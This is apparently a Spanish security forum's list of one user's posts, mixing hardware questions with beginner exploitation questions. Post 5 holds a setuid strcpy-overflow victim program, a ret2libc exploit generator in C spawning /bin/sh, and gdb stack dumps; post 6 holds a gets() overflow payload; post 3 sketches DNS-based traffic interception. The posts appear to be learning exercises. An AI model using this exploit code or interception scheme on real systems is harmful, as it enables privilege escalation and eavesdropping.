|
Mostrar Temas
|
Páginas: [1] 2
|
1
|
Informática / Hardware / Gráfica muerta? Recomendaciones nueva gráfica
|
en: 25 Abril 2017, 16:37 pm
|
Buenas, Mi PC ( https://foro.elhacker.net/hardware/pc_a_piezas_sobre_850%E2%82%AC-t339041.90.html)Después de un añadido de un par de memorias (ahora tengo 16GB) y un disco SSD, parece que la gráfica está diciendo basta. De vez en cuando (aunque últimamente ya es imposible funcionar con él), arranque windows, o ubuntu, pasado X minutos, empieza a salir cosas raras en la pantalla y en Windows se apaga y enciende la pantalla y te empieza a poner cosas de que el controlador gráfico ha dado un fallo. También me ha pasado que si arranco después, incluso en la BIOS empiezan a verse cosas raras... Entiendo que mi gráfica ha dicho basta (la otra vez se solucionó sacándola y conectándola bien y enchufando, pero creo que el truco... ha dejado de funcionar)... ¿Alguna recomendación de gráfica que no sea muy cara (no juego), y me pueda solventar el apaño de volver a tener PC? Gracias!
|
|
|
2
|
Informática / Hardware / Recomendaciones SSD nuevo
|
en: 1 Julio 2016, 13:41 pm
|
Pues monté por piezas hace unos 5 años mi PC de sobremesa siguiendo los consejos de la comunidad y como tan bien me fue, voy a repetir buscando consejo En el PC tengo un par de Samsung Spinpoint F3 HD103SJ de 1TB y la verdad es que aunque siempre han ido bien, creo que migrar los SO que tengo a un SSD, sería como el día y la noche respecto a la velocidad... Por ello, ¿Qué SSD me aconsejaríais? EL PC que monté por si os interesa está aquíTambién estoy pensando igual aumentar la RAM, pero eso ya es otro tema Gracias por vuestras sugerencias!
|
|
|
3
|
Seguridad Informática / Hacking / Es esto posible?
|
en: 16 Mayo 2012, 22:38 pm
|
Estaba pensando si esto estará ya implementado en el framework de metasploit o en alguna aplicación, o habrá que hacerlo a pelo.
Imaginemos una red de la que deseamos que todo el tráfico pase por nosotros. Somos capaces de hacer de servidor de dns de esa red, es decir, nosotros hacemos todas las traducciones de nombres, de tal manera, que somos capaces de darle nuestra ip en lugar de la verdadera.
¿Podemos hacer lo siguiente?
Victima => Dame google.com => Yo(DNS) => Mi Ip 192.168.1.2 Victima=>Llamo a google (192.168.1.2)=> Yo (sé que llama a google, lo mando a google transparentemente, pero yo me quedo con el tráfico).
Y sí, sé que se puede envenenar el ARP, pero mediante esta técnica,estaríamos captando, absolutamente todo el tráfico de la red y entiendo que dado que primero sabemos a donde van a invocar, después podemos saber a donde van.
Aunque claro, estoy suponiendo y no lo tengo claro, que el PC no cachee algunas traducciones sin necesidad de acudir al dns.
Saludos
|
|
|
4
|
Media / Juegos y Consolas / Nueva app para trofeos.
|
en: 31 Marzo 2012, 14:10 pm
|
Buenas chavales, Estamos montando una base de datos de guías de trofeos para nuestra aplicación Android (en un futuro bastante cercano disponible en iphone, blackberry, windows phone y puede que symbian). Ahora mismo aunque los juegos están insertados, juegos con trofeos solo tenemos un par de ellos. ¿Por qué? Porque no quiero copiarlos de ningún sitio, quiero que la gente que ya se ha pasado juegos y conoce los trofeos, diga con sus propias palabras como lo hizo y a ser posible con qué video de youtube lo hizo para facilitar todo al resto. El proyecto ha surgido de que a veces es muy incómodo estar con el PC al lado, buscando por foros. Pensamos que es más cómodo hacerlo desde un tablet o desde tu móvil, por otro lado a nosotros no nos interesa crearnos nuestro propio foro o web, porque entendemos que perjudicaríamos a éstos. Es por esto, que si subes el trofeo, puedes indicar aparte del vídeo, de que post(foro) o entrada de blog proviene el trofeo y así si el usuario tiene dudas, con un solo click llegará a él directamente mientras lo consulta. Esperamos poco a poco iros ofreciendo más servicios como sincronización con PSN/Live y similares. Gracias por vuestro tiempo, si aún os interesa participar después de este coñazo que he soltado, entrad en www.mastertrophy.netSaludos
|
|
|
5
|
Seguridad Informática / Bugs y Exploits / Esta vez duda usando libc
|
en: 21 Enero 2012, 00:08 am
|
Hola de nuevo compañeros, de nuevo tengo un problemilla. Vayamos por partes que diría jack el destripador: Tengo un programa que por poner un ejemplo se está ejecutando con el sticky bit y es propiedad de root y tiene una vulnerabilidad: int main(int argc, char *argv[]) { char little_array[512];
if(argc > 1) strcpy(little_array,argv[1]);
} Y empleo el siguiente programa para generarme en una variable de entorno el buffer con el que explotar la vulnerabilidad: #include <stdlib.h> #include<stdio.h>
#define offset_size 0 #define buffer_size 600
char sc[] = "\x80\x0d\xed\xb7" //system() "\xf0\x68\xec\xb7" //exit() "\xbe\xc7\xfb\xb7" //binsh ;
unsigned long find_start(void) { __asm__("movl %esp,%eax"); }
int main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=offset_size, bsize=buffer_size; int i;
if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]);
if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); }
addr = find_start() - offset; ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr += 4;
for (i = 0; i < strlen(sc); i++) *(ptr++) = sc[i];
buff[bsize - 1] = '\0';
memcpy(buff,"BUF=",4); putenv(buff); system("/bin/bash"); } Vale, entonces la idea es en una máquina en la que no tuviera una pila ejecutable, enviar el flujo a libc ejecutando una shell, para ello según el libro insertamos este cacho: char sc[] = "\x80\x0d\xed\xb7" //system() "\xf0\x68\xec\xb7" //exit() "\xbe\xc7\xfb\xb7" //binsh Donde serían las diferentes direcciones de esas llamadas (las he sacado mediante gdb como usa el libro y la de /bin/sh la he sacado con el memfetch como indica también, todo eso es correcto. La cuestión es que soy incapaz de lograr modificar el retorno y eso que cuando probé con el método de meter NOPs a saco si que lo conseguí. Los pasos que he realizado son los siguientes: Generaba por ejemplo $BUF con ./ret2libc 590 Y luego con gdb paraba la ejecución antes de realizar el strcpy y en el ret: Os dejo todos los desensamblados y más o menos los pasos que he seguido a ver en qué me estoy colando pianista@pianista-desktop:~ $ gdb -q victim Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". (gdb) disas main Dump of assembler code for function main: 0x08048374 <main+0>: push %ebp 0x08048375 <main+1>: mov %esp,%ebp 0x08048377 <main+3>: sub $0x218,%esp 0x0804837d <main+9>: and $0xfffffff0,%esp 0x08048380 <main+12>: mov $0x0,%eax 0x08048385 <main+17>: sub %eax,%esp 0x08048387 <main+19>: cmpl $0x1,0x8(%ebp) 0x0804838b <main+23>: jle 0x80483a7 <main+51> 0x0804838d <main+25>: mov 0xc(%ebp),%eax 0x08048390 <main+28>: add $0x4,%eax 0x08048393 <main+31>: mov (%eax),%eax 0x08048395 <main+33>: mov %eax,0x4(%esp) 0x08048399 <main+37>: lea 0xfffffdf8(%ebp),%eax 0x0804839f <main+43>: mov %eax,(%esp) 0x080483a2 <main+46>: call 0x80482a0 <strcpy@plt> 0x080483a7 <main+51>: leave 0x080483a8 <main+52>: ret End of assembler dump. (gdb) b *0x080483a2 Breakpoint 1 at 0x80483a2 (gdb) r $BUF Starting program: /home/pianista/victim $BUF
Breakpoint 1, 0x080483a2 in main () (gdb) disas strcpy Dump of assembler code for function strcpy: 0xb7f076f0 <strcpy+0>: push %ebp 0xb7f076f1 <strcpy+1>: mov %esp,%ebp 0xb7f076f3 <strcpy+3>: push %esi 0xb7f076f4 <strcpy+4>: mov 0x8(%ebp),%esi 0xb7f076f7 <strcpy+7>: mov 0xc(%ebp),%eax 0xb7f076fa <strcpy+10>: mov %esi,%ecx 0xb7f076fc <strcpy+12>: sub %eax,%ecx 0xb7f076fe <strcpy+14>: mov %eax,%edx 0xb7f07700 <strcpy+16>: movzbl (%edx),%eax 0xb7f07703 <strcpy+19>: mov %al,(%edx,%ecx,1) 0xb7f07706 <strcpy+22>: add $0x1,%edx 0xb7f07709 <strcpy+25>: test %al,%al 0xb7f0770b <strcpy+27>: jne 0xb7f07700 <strcpy+16> 0xb7f0770d <strcpy+29>: mov %esi,%eax 0xb7f0770f <strcpy+31>: pop %esi 0xb7f07710 <strcpy+32>: pop %ebp 0xb7f07711 <strcpy+33>: ret End of assembler dump. (gdb) b *0xb7f076f0 Breakpoint 2 at 0xb7f076f0 (gdb) b *0xb7f07711 Breakpoint 3 at 0xb7f07711 (gdb) continue Continuing.
Breakpoint 2, 0xb7f076f0 in strcpy () from /lib/tls/i686/cmov/libc.so.6 (gdb) x/20x $esp 0xbffff16c: 0x080483a7 0xbffff180 0xbffff565 0x00000000 0xbffff17c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff18c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff19c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff1ac: 0x00000000 0x00000000 0x00000000 0x00000000 (gdb) continue Continuing.
Breakpoint 3, 0xb7f07711 in strcpy () from /lib/tls/i686/cmov/libc.so.6 (gdb) x/20x $esp 0xbffff16c: 0x080483a7 0xbffff180 0xbffff565 0x00000000 0xbffff17c: 0x00000000 0xb7ed0d80 0xb7ec68f0 0xb7fbc7be 0xbffff18c: 0xbffff838 0xbffff838 0xbffff838 0xbffff838 0xbffff19c: 0xbffff838 0xbffff838 0xbffff838 0xbffff838 0xbffff1ac: 0xbffff838 0xbffff838 0xbffff838 0xbffff838 (gdb) continue Continuing.
Program received signal SIGSEGV, Segmentation fault. 0xbffff83f in ?? () (gdb) x/20x $esp 0xbffff38c: 0xc7beb7ec 0xbffff838 0xbffff838 0xbffff838 0xbffff39c: 0xbffff838 0xbffff838 0xbffff838 0xbffff838 0xbffff3ac: 0xbffff838 0xbffff838 0xbffff838 0xbffff838 0xbffff3bc: 0xbffff838 0xbffff838 0xbffff838 0xbffff838 0xbffff3cc: 0x0000f838 0x00000000 0xb7ff9300 0xb7eafded (gdb) r $BUF The program being debugged has been started already. Start it from the beginning? (y or n) y
Starting program: /home/pianista/victim $BUF
Breakpoint 1, 0x080483a2 in main () (gdb) continue Continuing.
Breakpoint 2, 0xb7f076f0 in strcpy () from /lib/tls/i686/cmov/libc.so.6 (gdb) x/20x $esp 0xbffff16c: 0x080483a7 0xbffff180 0xbffff565 0x00000000 0xbffff17c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff18c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff19c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff1ac: 0x00000000 0x00000000 0x00000000 0x00000000 (gdb) x/700x $esp 0xbffff16c: 0x080483a7 0xbffff180 0xbffff565 0x00000000 0xbffff17c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff18c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff19c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff1ac: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff1bc: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff1cc: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff1dc: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff1ec: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff1fc: 0x00000000 0x0804820c 0x0d696910 0xb7ea5fa8 0xbffff20c: 0xbffff244 0xb7fefb79 0xb7eabcd4 0x08048202 0xbffff21c: 0xb80019b9 0xb80019ac 0xb7fe6b38 0xbfff0002 0xbffff22c: 0xb7ff4c69 0x080481d0 0xb80019b8 0xb8000ff4 0xbffff23c: 0xb7fe6b0c 0x00000001 0xbffff2c8 0xb7feff42 0xbffff24c: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff25c: 0x00000123 0x0003d8f5 0xbffff294 0xbffff294 0xbffff26c: 0xbffff384 0xf63d4e2e 0xb7fe6858 0x00000003 0xbffff27c: 0xb7e9dc28 0xb7e9da28 0x080481f0 0xf63d4e2e 0xbffff28c: 0x080481fc 0x080481f4 0x00000000 0x00000000 0xbffff29c: 0x00000001 0x00000838 0xb7fe6b38 0xb7fe6858 0xbffff2ac: 0x080481f0 0xb7ea67a8 0x08048190 0x00000001 0xbffff2bc: 0xb8000ff4 0xb8001898 0xbffff378 0xbffff394 0xbffff2cc: 0xb7ff0103 0x08048190 0xbffff378 0xb800183c ---Type <return> to continue, or q <return> to quit---q Quit
Perdón por la chapa, es que he probado con diferentes - 600,590,595 y logro algún ilegal instrucion pero nada soy incapaz, y es que creo que no estoy acabándolo de pillar del todo. Saludos y gracias.
|
|
|
6
|
Seguridad Informática / Bugs y Exploits / Duda sobre buffer overflow
|
en: 23 Diciembre 2011, 14:48 pm
|
Hola qué tal? A ver, tengo una duda que no me está permitiendo avanzar en este campo. Empecé a leer el libro de shellcoders sobre exploits, entonces uno de los primeros ejemplos del libro es: void return_input(void) { char array[30];
gets(array); printf("%s\n",array); }
main() { return_input();
return 0; }
Vale, la idea es la siguiente: Desensamblas con gdb la parte del main y obtienes la dirección a la que se invoca al return_input, con el fin de desbordar el buffer para que lo ejecute dos veces. Aquí llega la cuestión, desesamblando me saca (por poner un ejemplo): 0x080483ed <main+3> call 0x80483c4 <return_input> Y desbordo el buffer como indica el libro : printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDD\xed\x83\x04\x08"|./overflow Ahí está la cuestión, que no logro de ninguna manera que no dé segmentation fault, y que me repita dos veces la llamada al return_input Estoy usando wifislax 2.0, que aquellos kernel y gcc y tal, no llevaban protecciones overflow, pero claro, yo lo que pienso es lo siguiente: Cómo coño va afuncionar, esa dirección que saca el gdb, no tiene por qué coincidir con la que haya en tiempo de ejecución, no??? Saludos y espero ayuda, que me encantaría iniciarme en profundidad, aunque ya he visto que el tema en los últimos años, ha ido poniendo muchísimas protecciones.
|
|
|
7
|
Foros Generales / Foro Libre / Master seguridad UPM alguien conoce?
|
en: 21 Septiembre 2011, 20:52 pm
|
Pues eso, si alguien tiene referencias o lo ha hecho para que me comente un poco que tal es y eso, porque vale una pasta y ahora que estoy aún a tiempo de redefinir lo que haré este año, es una opción que estoy barajando xD
Saludos
|
|
|
8
|
Informática / Hardware / PC a piezas sobre 850€
|
en: 15 Septiembre 2011, 00:12 am
|
Compañeros de la nave del misterio:
Me gustaría pediros consejo, porque voy a acabar grillado de mirar tantísimas reviews de componentes, y sé que vosotros estáis mas actualizados que yo en estos temas.
La idea sería gastarme sobre 850€ en la torre, no lo quiero para jugar, pero sí me gustaría tener un buen rendimiento a la hora de manejar gráficos como pueda ser photoshop, edición de video, etc.
Además me gustaría poder usar alguna orquestilla virtual del sibelius, sin que se me muera el pc cada dos por tres.
Qué me recomendáis?
Para precios y tal, había pensado montarlo en PCBox de Valladolid, (el de Marina escobar me pilla mejor, pero me da igual uno que otro).
Saludos y gracias!
|
|
|
|
|
|
|